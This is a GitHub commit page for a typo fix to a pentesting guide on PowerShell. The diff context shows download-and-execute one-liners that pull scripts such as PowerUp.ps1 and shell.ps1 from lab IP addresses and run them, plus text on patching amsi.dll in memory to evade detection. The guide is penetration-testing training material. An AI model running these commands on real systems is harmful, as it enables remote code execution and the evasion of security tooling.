Skip to content

Commit

Permalink
Merge pull request #1002 from Neved4/typo2
Browse files Browse the repository at this point in the history
Fix typos in `Basic PowerShell for Pentesters`
  • Loading branch information
carlospolop authored Jan 22, 2025
2 parents cca5a69 + e34c90d commit b7409aa
Showing 1 changed file with 1 addition and 5 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,6 @@ Get-Command -Module <modulename>
## Download & Execute

```powershell
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
Expand Down Expand Up @@ -141,7 +140,7 @@ ValueData : 0

**`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.

Therefore, the goal of the AMSI bypasses you will are to **overwrite the instructions of that DLL in memory to make the detection useless**.
Therefore, the goal of the AMSI bypasses you will use is to **overwrite the instructions of that DLL in memory to make the detection useless**.

**AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)

Expand Down Expand Up @@ -465,6 +464,3 @@ RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
```

{{#include ../../banners/hacktricks-training.md}}



0 comments on commit b7409aa

Please sign in to comment.